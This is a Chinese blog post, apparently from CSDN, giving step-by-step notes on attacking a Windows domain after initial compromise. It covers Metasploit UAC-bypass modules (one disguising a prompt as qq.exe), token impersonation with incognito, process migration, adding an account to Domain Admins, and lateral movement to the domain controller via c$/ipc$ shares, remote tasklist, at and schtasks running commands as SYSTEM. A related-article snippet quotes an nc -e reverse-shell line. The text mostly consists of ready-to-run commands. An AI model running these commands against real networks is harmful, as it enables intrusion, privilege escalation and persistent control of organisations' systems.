域安全(2)横向移动和纵向移动以及域的提权(后渗透)

最新推荐文章于 2023-09-27 13:50:39 发布
最新推荐文章于 2023-09-27 13:50:39 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 内网安全 文章标签: 服务器 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123775319
版权
域安全-UAC提权
需要UAC提权进行的操作:(基本在控制面板)
1.系统的更新
2.增加/修改账户
3.修改UAC设置等
借助msf
1.已经通过木马使目标计算机被控制 成功上线
2.进行UAC提权尝试(失败率比较高)
use exploit/windows/local/bypassuac (多用来进攻32位系统)
show options
set SESSION 1   //具体是几号机器就填相应的数字
exploit 开始攻击/run也可以执行
//如果攻击成功,会给你一个新的session号
进入新的session号
getuid
getsystem
ask模块进行uac提权
background 先把木马放到后台
use exploit/windows/local/ask 加载ask模块
info 查看漏洞信息
set SESSION 1    //使用漏洞在1号木马控制的目标上
set FILENAME   qq.exe   //伪装成文件名为qq
set LHOST [本地的ip地址]    //设置本地监听地址
exploit
会在用户桌面上弹出一个允许qq启动,用户选择yes,成功
getuid     //发现还不是system
getsystem  //可以提高到最高
域安全-令牌窃取 纵向移动 横向移动
令牌-token  更类似于web安全中的cookie
伪造令牌 可以实现提权 也就是纵向移动提权方法的一种
核心:kerberos协议
借助工具msf
步骤:
1.木马成功使目标计算机上线
2.进入一个session 
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator(这个地方是上面出现的令牌中想要盗用的令牌的名字 反斜杠写两个)
//Successfully
shell  //即可获得冒用的相应的执行权限
whoami
纵向移动(这里介绍一种进程迁移注入的提权方法)
(移动到哪个进程 就可以以哪个进程的名义 做该进程持有者相应权限的事情)
1.首先不论任何手段获得system权限
此时权限是AUTHORITY\SYSTEM 我们需要横向移动到域管理员的权限上
2. 进程迁移提权
migrate [相应进程的pid]   //当前进程迁移到其他进程后 权限可能会根据进程权限而改变 可以找高权限的类似 TEST1\Administrator 域管理员的权限
get uid  //此时已经是域控管理员权限就够了 不能getsystem 否则会失去管理员的权限
3.令牌伪造提权: (这一步下才可以执行add_user命令) (也就是上面的伪造令牌 这里重复介绍一下) 
use incognito
list_tokens -u
impersonate_token TEST1\\Administrator
3.后续操作 (纵向移动提权成功以后的横向移动以及后渗透) 
#add_user [新用户账号] [新用户密码] -h [域控服务器ip地址]
add_user lyj Test123 -h 192.168.109.136
add_group_user "domain admins" lyj -h 192.168.109.136
shell
net group "domain admins"   //只能在域控制器上使用的命令
横向移动(纵向移动提权成功以后的情况下的横向移动)
1.使用纵向移动的方法 不论使用了哪种提权方法
这里默认已经获得了TEST1\Administrator 域控管理员权限 并且成功建立了另一个管理员权限的账户lyj
2.默认情况下域控windows会开放c盘的共享
方法1: 进入网络驱动器的映射
3.点击完成 登录刚才建立的新的管理员账户
方法2:命令行操作 
net use \\192.168.109.136\c$ "Test123" /user:lyj
net share
net use
dir \\192.168.109.136\c$
type \\192.168.109.136\c$\a.txt
方法2-2:
当对方 开启了135 445端口时可以使用ipc$  或者管理员什么都没有修改那么可以使用ipc$  可以使用的权限更高 
net use \\192.168.109.136\ipc$ "Test123" /user:lyj
net use
方法2-3:
远程访问(以远程访问进程为例) 
tasklist /S 192.168.109.136 /U lyj /P Test123
方法2-4:
在内网被控制的机器的C盘创建一个文本文件a.txt
然后cmd执行命令 
可以把本机的文件拷贝到域控电脑C盘上的 这里也可以考虑传木马等 都很轻松了 
copy a.txt \\192.168.109.136\c$
方法2-5:计划任务 9点51执行cmd命令并且输出到c盘下的1.txt内 
at \\192.168.109.136 9:51PM cmd.exe /c "ipconfig > c:/1.txt" 
方法2-6:针对比较新的系统 
schtasks /create /s 192.168.109.136 /tn test1 /sc onstart /tr c:/a.bat /ru system /f

Simon_Smith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网横向移动——渗透
Captain_RB的博客
09-08 2744
本文结合实践经验,详细介绍内网渗透的基本思路和通用方法。
内网安全横向移动&提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
今天是几号的博客
04-02 1164
当Windows系统的Active Directory证书服务(CS)在上运行时,由于机器账号中的dNSHostName属性不具有唯一性,中普通用户可以将其更改为高权限的控机器账号属性,然后从Active Directory证书服务中获取控机器账户的证书,导致中普通用户权限提升为管理员权限。
安全科普】企业内网中的横向移动
2201_75857562的博客
03-03 652
通过上文的攻击实例,我们展示了一个相对简单的“横向移动”攻击链路模型。实际上,在横向移动攻击过程中,攻击者不仅可以运用相关技术与思路访问共享文件夹、凭证等敏感信息,也可以通过“横向移动”的方法渗透其它主机,窃取商业数据、财务信息等。正因如此,“横向移动”的技术与攻击思路被广泛应用于网络攻击,尤其是针对企业用户的APT(高级可持续性威胁)攻击中。
【基础篇】————28、横向渗透
Fly_鹏程万里
05-27 2764
0x00 端口渗透 端口扫描 端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组...
网络战争升级:横向渗透vs纵向渗透,谁才是真正的黑客大师
vivlol918的博客
09-27 1030
通过组织安全意识教育、网络分段、权限管理、安全审计、数据加密和监视等措施,可以有效防护纵向渗透攻击。然而,安全是一个持续的过程,需要不断更新和改进防护措施以应对不断变化的威胁。
移动互联网白皮书
05-20
工业和信息化部电信研究院,2014年出的移动互联网白皮书。 目 录 一、 国内外移动互联网发展状况 (一) ICT 产业的核心技术平台/体系颠覆性迁移 (二) 开放与开源成为主流技术的主导发展模式 (三) 互联网应用...
通信行业深度报告:5G专网助力产业横向拓展,打开5G纵向新空间.zip
10-17
报告标题:“通信行业深度报告:5G专网助力产业横向拓展,...综上所述,5G专网作为通信行业的新里程碑,正以前所未有的方式改变着我们的生活和工作方式,其在产业横向拓展和纵向空间的开辟,预示着5G时代的广阔前景。
信息系统安全风险.docx
06-17
二级(重大):公司重要部门或局部地区基础网络、重要信息系统、重点网站瘫痪,导致业务中断,但纵向横向延伸可能造成严重社会影响或较大经济损失的信息安全事件。 三级(较大):公司重要部门网络与信息系统、...
保密管理与信息安全培训.ppt
10-07
电力二次系统安全防护策略包括安全分区、网络专用、横向隔离、纵向认证等措施。 信息系统安全威胁包括人为的无意识失误、人为的恶意攻击、信息系统本身缺陷、物理环境影响、管理不当、病毒木马等。这些威胁可能导致...
安全技术及对策.pdf
10-04
7. **轨道爬行**:轨道爬行是钢轨及轨枕纵向移动的现象,由多种力的作用引起。防止爬行的关键是安装足够数量的防爬器。 8. **胀轨跑道**:轨温升高时,钢轨受阻膨胀可能导致胀轨跑道,尤其是在无缝线路中。预防措施...
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4761
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
内网安全第一百三十三天
B_l_a_nk的博客
08-21 360
0、横向移动-系统漏洞-CVE-2017-0146 1、横向移动-提权-CVE-2014-6324 2、横向移动-提权-CVE-2020-1472 3、横向移动-提权-CVE-2021-42287 4、横向移动-提权-CVE-2022-26923
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 711
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
提权学习之旅——基础篇
Lemon's blog
07-30 843
前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要进行提权操作,方便下一步的进行!看了很多师傅们的博客,大多都是总结下常用思路,对于我这种菜鸡来说还是有点难懂,所以就通过这次总结将理论和实践联系到一起! 基础知识 0x00:什么是提权 提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。 简单的一句话就是权限提升。例如: Windows:User >> Syste
第四章——权限提升分析及防御
willow_liang的博客
12-24 2473
第4章权限提升分析及防御 在 Windows中,权限大概分为四种、分别是User、Administrator、System、TrustedInstaller。在这四种权限中,我们经常接触的是前三种。第四种权限 TrustedInstaller,在常规使用中通常不会涉及。 User:普通用户权限,是系统中最安全的权限(因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料)。 Administrator:管理员权限。可以利用Windows 的机制将自己提升为Svstem权限,以便操作SAM文件等。
Common Linux Privesc(常见的Linux提权--easy)
Che_ng的博客
05-11 258
横向提权()和纵向提权([外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U3oWYkGT-1683820001344)一个bash脚本:https://github.com/rebootuser/LinEnum/blob/master/LinEnum.shLinEnum 是一个简单的 bash 脚本,它执行与权限提升相关的常见命令对于LinEnum的扫描结果,需要重点关注以下地方*Kernel*:内核信息;:全局可写文件。任何经过身份验证的用户都可以读取和写入这些文件。
内网渗透基石篇--权限提升(上)
dzqxwzoe的博客
08-21 599
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-DRvpkEuv-1692615488651)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-oGGpIxNh-1692615488653)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限。
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5601
内网渗透测试:内网横向移动基础总结 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集内凭证等各种方法,访问内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
关于渗透与免杀对抗思考及其常见方式
最新发布
03-16
英文叫DOMAIN——(Domain)是Windows网络中独立运行的单位,之间相互 访问则需要建立信任关系(即Trust Relation)。信任关系是连接在之间的桥梁。 当一个与其他建立了信任关系后,2个之间不但可以按需要相互进行管理,还可 以跨网分配文件和打印机等设备资源,使不同的之间实现网络资源的共享与管理,以及相互 通信和数据传输。 既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,安全边界。 管理员只能管理的内部,除非其他的显式地赋予他管理权限,他才能够访问或者 管理其他的,每个都有自己的安全策略,以及它与其他安全信任关系。 如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值